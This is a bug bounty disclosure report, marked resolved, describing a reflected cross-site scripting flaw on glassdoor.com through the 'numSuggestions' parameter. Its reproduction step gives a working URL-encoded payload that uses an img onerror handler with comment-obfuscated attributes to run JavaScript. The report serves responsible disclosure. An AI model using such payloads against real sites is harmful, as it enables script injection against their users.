Reflected XSS at https://www.glassdoor.com/ via the 'numSuggestions' parameter
Medium
G
Glassdoor
Submitted None
Actions:
Reported by
l0cpd
Vulnerability Details
Technical details and impact analysis
Hi there,
I have found the xss vulnerability at: https://www.glassdoor.com/ via parameter: `numSuggestions`
**Summary:**
Affected Parameter: `numSuggestions`
**Browsers tested:** Firefox, Chrome, Edge (latest version)
## Steps To Reproduce:
Go to: `https://www.glassdoor.com/searchsuggest/typeahead?numSuggestions=8rk3s6%22%3Cimg/**/src%3D%22x%22/**/onx%3D%22%22/**/onerror%3D%22alert%60l0cpd%60%22%3Ef9y60`
{F1092213}
## Supporting Material/References (screenshots, logs, videos):
{F1092214}
Regards,
@l0cpd
## Impact
The attacker can execute JS code.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected